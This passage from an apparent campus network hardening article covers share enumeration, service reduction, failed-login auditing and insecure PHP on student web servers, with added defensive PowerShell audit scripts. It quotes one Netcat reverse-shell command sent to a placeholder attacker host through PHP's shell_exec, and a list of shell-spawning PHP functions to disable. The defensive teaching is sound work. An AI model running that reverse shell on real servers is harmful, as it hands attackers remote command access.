Now one of the students is poking around on the network to see what computers are out there and what shares they can get into.
They could just be curious, or they could be looking for other students that have shared out their MP3 and movie collections. They may just browse around using Network Neighborhood, or use an automated tool like Legion or SoftPerfect's NetScan to find all of the network shares available to them in a certain IP range. While looking around the student comes across a share called “Student Database”; two guesses what kind of information is in it. Scan your own network for open file shares before someone else does. Besides Legion and NetScan there’s also ShareEnum which can scan for shares by Domain/Workgroup or IP range and report what permissions different groups have to the shares.
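The share inventory the paragraph recommends can be scripted rather than clicked through. The following is an added example, not code from the original article or from the tools it names; it assumes the SmbShare module (Windows 8 / Server 2012 or later), WinRM access to the servers, and administrative rights there, and the server names are placeholders.

```powershell
# Added example: list every non-administrative SMB share on a set of servers, together with
# the accounts granted access, and flag shares readable by broad or anonymous groups.
# Server names below are placeholders; replace them with hosts you administer.
$servers = @('FILESRV01', 'WEBSRV01')

# Account names whose "Allow" entries deserve a second look on a student network
$broadGroups = 'Everyone|Authenticated Users|ANONYMOUS LOGON|Guests|\\Users$'

$report = foreach ($server in $servers) {
    $session = New-CimSession -ComputerName $server -ErrorAction Stop
    # Skip the built-in administrative shares (C$, ADMIN$, IPC$); user-created shares are the concern.
    $shares = Get-SmbShare -CimSession $session | Where-Object { -not $_.Special }
    foreach ($share in $shares) {
        Get-SmbShareAccess -CimSession $session -Name $share.Name | ForEach-Object {
            [pscustomobject]@{
                Server  = $server
                Share   = $share.Name
                Path    = $share.Path
                Account = $_.AccountName
                Access  = $_.AccessControlType   # Allow or Deny
                Right   = $_.AccessRight         # Full, Change or Read
                Risky   = ($_.AccessControlType -eq 'Allow') -and ($_.AccountName -match $broadGroups)
            }
        }
    }
    Remove-CimSession $session
}

# Risky entries first, so a share like "Student Database" open to Everyone is at the top
$report | Sort-Object Risky -Descending, Server, Share | Format-Table -AutoSize
```

Share-level permissions are only half the picture: a share granted to Everyone may still be protected by NTFS permissions on the folder, so check the path's ACL (Get-Acl on the share path) before deciding a flagged entry is actually exposed.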
Disabling unneeded services like Personal Web Server, SNMP, Simple TCP/IP Services and others can also go a long way to cutting down on potential exploits. Even a system that is behind on service packs and hot fixes can’t be exploited if the vulnerable services aren’t there to begin with.
Turn off anything that is not used and pay attention to what is being installed on the network.
Watch the web and security event logs. There are many times where I would not have noticed attackers on the network if it were not for looking in Event Viewer for failed login attempts.
Naturally, logging must be turned on for this to work, so open up MMC (Microsoft Management Console), add the Security Configuration and Analysis snap-in, and set up auditing of failed logins and access attempts. Better yet, set up a GPO (Group Policy Object) so that security auditing is configured automatically when a machine joins the network.
If an IDS (Intrusion Detection System) is running at the facility make sure someone is looking at the logs. An IDS like Snort is useless if no one actually looks at what is reported.
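Looking for failed logins in Event Viewer by hand does not scale past a handful of machines. The following is an added example, not code from the original article: it turns on failure auditing for logons with auditpol (the command-line equivalent of the snap-in or GPO setting described above) and then summarises failed logons, which Windows records as Security event 4625, by source address. It assumes a modern Windows host, an elevated PowerShell prompt, and a threshold of ten failures that is an arbitrary starting point.

```powershell
# Added example: enable logon failure auditing, then group the last 24 hours of failed
# logons (Security event ID 4625) by the address they came from.
auditpol /set /subcategory:"Logon" /failure:enable | Out-Null

$since  = (Get-Date).AddHours(-24)
$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625; StartTime = $since } `
                       -ErrorAction SilentlyContinue   # no error if nothing matched

$rows = foreach ($event in $events) {
    # Read named fields from the event XML rather than relying on positional Properties
    $data = ([xml]$event.ToXml()).Event.EventData.Data
    [pscustomobject]@{
        Time    = $event.TimeCreated
        Account = ($data | Where-Object Name -eq 'TargetUserName').'#text'
        Source  = ($data | Where-Object Name -eq 'IpAddress').'#text'
        Status  = ($data | Where-Object Name -eq 'Status').'#text'   # 0xC000006D = bad user name or password
    }
}

$threshold = 10   # assumption: tune for the site
$rows | Group-Object Source | Where-Object Count -ge $threshold |
    Sort-Object Count -Descending |
    Select-Object @{ n = 'Source';   e = { $_.Name } },
                  Count,
                  @{ n = 'Accounts'; e = { ($_.Group.Account | Sort-Object -Unique) -join ', ' } } |
    Format-Table -AutoSize
```

One source address trying many different account names is the pattern worth escalating; one account failing a few times from its usual machine is usually just a forgotten password. Run this on a schedule and write the table to a file or a central log server so it is actually read, which is the same point the paragraph makes about the IDS.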
Most universities give students and staff the ability to create their own web pages on a campus web server. Sometimes the users can even create ASP or PHP files for their website to make them more dynamic.
With PHP installed and configured insecurely a user could run an arbitrary program in their web folder, for example Netcat, with a command like this:
$x = shell_exec("nc AttackingBoxIP 30 -e cmd ");
The previous command shovels a shell back to the attacker, giving them command-line access to the web server; from there they could leapfrog to other machines while appearing to be the web server rather than themselves. Active Server Pages offer similar functionality (Wscript.Shell).
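Whether a user page can spawn programs at all depends on the PHP configuration on the server. The following is an added example, not code from the original article or from the PHP project: a PowerShell check that reads a php.ini on a Windows web server and reports which shell-spawning functions are still enabled and whether scripts are confined with open_basedir. The php.ini path is a placeholder, and the list of functions to expect in disable_functions is an assumption to adapt to the site.

```powershell
# Added example: audit php.ini for the settings that let a page in a user's web folder run programs.
function Test-PhpShellConfig {
    param([Parameter(Mandatory)][string]$IniPath)

    # Functions that hand a string to the operating system shell or start a process
    $shellFunctions = 'exec', 'shell_exec', 'system', 'passthru', 'popen', 'proc_open'

    $disabledSet = @()
    $openBasedir = $null
    foreach ($line in Get-Content $IniPath) {
        if ($line -match '^\s*;') { continue }   # comment line
        if ($line -match '^\s*disable_functions\s*=\s*"?([^"]*)"?') {
            # Last uncommented setting wins, as PHP itself applies them
            $disabledSet = $Matches[1] -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ }
        }
        elseif ($line -match '^\s*open_basedir\s*=\s*"?([^"]*)"?') {
            $openBasedir = $Matches[1].Trim()
        }
    }

    $stillEnabled = $shellFunctions | Where-Object { $_ -notin $disabledSet }

    [pscustomobject]@{
        IniPath               = $IniPath
        ShellFunctionsEnabled = if ($stillEnabled) { $stillEnabled -join ', ' } else { '(none)' }
        OpenBasedir           = if ($openBasedir) { $openBasedir } else { '(not set)' }
        NeedsAttention        = [bool]$stillEnabled -or -not $openBasedir
    }
}

# Placeholder path; point it at the php.ini the web server actually loads (check phpinfo() for "Loaded Configuration File")
Test-PhpShellConfig -IniPath 'C:\php\php.ini' | Format-List
```

If the report lists any of those functions as enabled on a server that hosts user pages, the fix is a line such as disable_functions = exec,shell_exec,system,passthru,popen,proc_open in that php.ini (restart the web server afterwards), plus an open_basedir that confines each user's scripts to their own folder. The same review applies to ASP: on IIS, confirm that the accounts user pages run under cannot create Wscript.Shell, or that the scripting component is unregistered on that server.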